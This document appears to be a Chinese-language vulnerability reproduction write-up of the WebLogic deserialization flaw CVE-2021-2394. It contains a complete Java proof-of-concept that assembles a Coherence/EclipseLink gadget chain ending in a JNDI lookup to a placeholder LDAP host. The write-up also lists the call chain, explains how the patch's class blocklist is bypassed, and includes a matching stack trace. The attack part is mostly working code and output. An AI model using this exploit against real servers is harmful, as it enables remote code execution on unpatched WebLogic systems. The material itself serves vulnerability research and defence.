Oracle WebLogic Server: 12.2.1.3.0、12.2.1.4.0、14.1.1.0.0
POC:
package cve2021.cve_2021_2394;
import com.sun.rowset.JdbcRowSetImpl;
import com.tangosol.coherence.servlet.AttributeHolder;
import com.tangosol.util.SortedBag;
import com.tangosol.util.aggregator.TopNAggregator;
import oracle.eclipselink.coherence.integrated.internal.querying.FilterExtractor;
import org.eclipse.persistence.internal.descriptors.MethodAttributeAccessor;
import org.eclipse.persistence.internal.descriptors.VirtualAttributeAccessor;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.concurrent.ConcurrentSkipListMap;
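/**
 * Proof-of-concept for the WebLogic deserialization issue analysed on this page (CVE-2021-2394).
 *
 * <p>Wires Coherence and EclipseLink objects together so that deserializing the result with an
 * unfiltered {@link ObjectInputStream} follows the call chain listed under "利用链" below and ends
 * in {@code JdbcRowSetImpl.connect()}. The defensive point it illustrates: a JEP 290
 * {@code ObjectInputFilter} (or the vendor patch's class blocklist) has to reject these types
 * before any {@code readExternal} runs.
 *
 * <p>Requires the Coherence/EclipseLink jars and a same-package {@code AttrCompare} comparator,
 * neither of which is shown on this page.
 */
public class CVE_2021_2394 {

    /**
     * Sets {@code fieldName} on {@code obj} by reflection, searching the class hierarchy.
     *
     * @param obj       target instance (must not be null)
     * @param fieldName name of a field declared on {@code obj}'s class or one of its superclasses
     * @param value     value to store
     * @throws NoSuchFieldException if no class in the hierarchy declares the field
     * @throws Exception            on any other reflection failure (e.g. {@link IllegalAccessException})
     */
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = getField(obj.getClass(), fieldName);
        if (field == null) {
            // Previously this fell through to a NullPointerException that named neither the field
            // nor the class; report the miss explicitly instead.
            throw new NoSuchFieldException(
                    fieldName + " not declared on " + obj.getClass().getName() + " or its superclasses");
        }
        field.set(obj, value);
    }

    /**
     * Finds a declared field by name on {@code clazz} or the nearest superclass that declares it,
     * with accessibility already enabled.
     *
     * @param clazz     class to start the search from
     * @param fieldName field name
     * @return the accessible {@link Field}, or {@code null} if no class in the hierarchy declares it
     */
    public static Field getField(Class<?> clazz, String fieldName) {
        // Iterative walk up the hierarchy; same result as the original recursive lookup.
        for (Class<?> current = clazz; current != null; current = current.getSuperclass()) {
            try {
                Field field = current.getDeclaredField(fieldName);
                field.setAccessible(true);
                return field;
            } catch (NoSuchFieldException ignored) {
                // Not declared on this class; keep walking up.
            }
        }
        return null;
    }

    /**
     * Builds the serialized payload and reads it straight back in.
     *
     * <p>Writes {@code oracle/1.ser} relative to the working directory (the directory must exist)
     * and reads the same file back with a plain {@link ObjectInputStream}. No
     * {@code ObjectInputFilter} is installed, so the read side exercises the chain in the stack
     * trace on this page. Both streams are closed with try-with-resources so a failure part-way
     * through no longer leaks the file handle.
     *
     * @param args unused
     * @throws Exception on reflection, I/O or deserialization failure
     */
    public static void main(String[] args) throws Exception {
        // Terminal object of the chain: JdbcRowSetImpl.connect() hands the data-source name to
        // InitialContext.lookup() (see the stack trace on this page). The host is the original
        // write-up's placeholder.
        JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl();
        jdbcRowSet.setDataSourceName("ldap://xxx.xxx.xxx.xxx");

        // Accessor whose "getter" is prepare(): getAttributeValueFromObject() invokes it
        // reflectively on whatever object it is asked to extract from (Method.invoke in the trace).
        MethodAttributeAccessor methodAttributeAccessor = new MethodAttributeAccessor();
        methodAttributeAccessor.setIsWriteOnly(true);
        methodAttributeAccessor.setAttributeName("123");
        methodAttributeAccessor.setGetMethodName("prepare");
        methodAttributeAccessor.setSetMethodName("setProperties");

        // Extractor delegating to that accessor; AbstractExtractor.compare() calls extract().
        FilterExtractor filterExtractor = new FilterExtractor();
        filterExtractor.setAccessor(methodAttributeAccessor);

        // PartialResult.readExternal() re-adds its entries to a SortedBag, whose comparator path
        // reaches the extractor (利用链 above).
        TopNAggregator.PartialResult partialResult = new TopNAggregator.PartialResult(filterExtractor, 10);

        // Map holding the row set as a key; presumably what readExternal() refills — the field
        // name "m_map" comes from Coherence and is not visible on this page. Raw type kept because
        // AttrCompare's Comparator type argument is not visible here either.
        AttrCompare attrCompare = new AttrCompare();
        ConcurrentSkipListMap concurrentSkipListMap = new ConcurrentSkipListMap(attrCompare);
        concurrentSkipListMap.put(jdbcRowSet, "123");
        setFieldValue(partialResult, "m_map", concurrentSkipListMap);

        // PartialResult only implements ExternalizableLite, so it is wrapped in an Externalizable
        // AttributeHolder to be reachable from ObjectInputStream (see "source" below).
        AttributeHolder attributeHolder = new AttributeHolder();
        setFieldValue(attributeHolder, "m_sName", "111");
        setFieldValue(attributeHolder, "m_oValue", partialResult);

        try (ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("oracle/1.ser"))) {
            oos.writeObject(attributeHolder);
        }
        try (ObjectInputStream ois = new ObjectInputStream(new FileInputStream("oracle/1.ser"))) {
            ois.readObject();
        }
    }
}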
利用链:
AttributeHolder.readExternal()
ExternalizableHelper.readObject()
ExternalizableHelper.readObjectInternal()
ExternalizableHelper.readExternalizableLite()
TopNAggregator$PartialResult.readExternal()
SortedBag.add()
TreeMap.put()
TreeMap.compare()
SortedBag$WrapperComparator.compare()
AbstractExtractor.compare()
FilterExtractor.compare()
FilterExtractor.extract()
MethodAttributeAccessor.getAttributeValueFromObject()
Method.invoke()
JdbcRowSetImpl.connect()
sink:
org.eclipse.persistence.internal.descriptors.MethodAttributeAccessor#getAttributeValueFromObject方法中存在反射调用；在getMethod、anObject、parameters均可控的情况下,即可调用任意对象的任意方法
在打了补丁的情况下,MethodAttributeAccessor已经被拉入黑名单；但如果在其他类的反序列化过程中存在MethodAttributeAccessor的创建并调用,则仍然可以绕过
然后发现oracle.eclipselink.coherence.integrated.internal.cache.SerializationHelper#readAttributeAccessor符合这一条件,会创建MethodAttributeAccessor对象并返回
并且它的attributeAccessor的值正是绕过黑名单所调用的方法,可以创建MethodAttributeAccessor对象
其他的都是按照调用方法直接找调用关系即可,注意子父类之间的调用关系。
source:
由于TopNAggregator$PartialResult只实现了ExternalizableLite,因此还是需要由实现了Externalizable的AttributeHolder去封装PartialResult,从而正常地触发反序列化
lookup:417, InitialContext (javax.naming)
connect:624, JdbcRowSetImpl (com.sun.rowset)
prepare:654, JdbcRowSetImpl (com.sun.rowset)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:497, Method (java.lang.reflect)
getAttributeValueFromObject:82, MethodAttributeAccessor (org.eclipse.persistence.internal.descriptors)
getAttributeValueFromObject:61, MethodAttributeAccessor (org.eclipse.persistence.internal.descriptors)
extract:61, FilterExtractor (oracle.eclipselink.coherence.integrated.internal.querying)
compare:143, AbstractExtractor (com.tangosol.util.extractor)
compare:416, SortedBag$WrapperComparator (com.tangosol.util)
compare:1291, TreeMap (java.util)
put:538, TreeMap (java.util)
add:152, SortedBag (com.tangosol.util)
add:270, TopNAggregator$PartialResult (com.tangosol.util.aggregator)
readExternal:299, TopNAggregator$PartialResult (com.tangosol.util.aggregator)
readExternalizableLite:2345, ExternalizableHelper (com.tangosol.util)
readObjectInternal:2661, ExternalizableHelper (com.tangosol.util)
readObject:2606, ExternalizableHelper (com.tangosol.util)
readObject:2583, ExternalizableHelper (com.tangosol.util)
readExternal:407, AttributeHolder (com.tangosol.coherence.servlet)
readExternal:372, AttributeHolder (com.tangosol.coherence.servlet)
readExternalData:1842, ObjectInputStream (java.io)
readOrdinaryObject:1799, ObjectInputStream (java.io)
readObject0:1351, ObjectInputStream (java.io)
readObject:371, ObjectInputStream (java.io)
main:85, CVE_2021_2394 (cve2021.cve_2021_2394)
原文始发于微信公众号(路旅安全):Weblogic CVE-2021-2394漏洞复现分析原创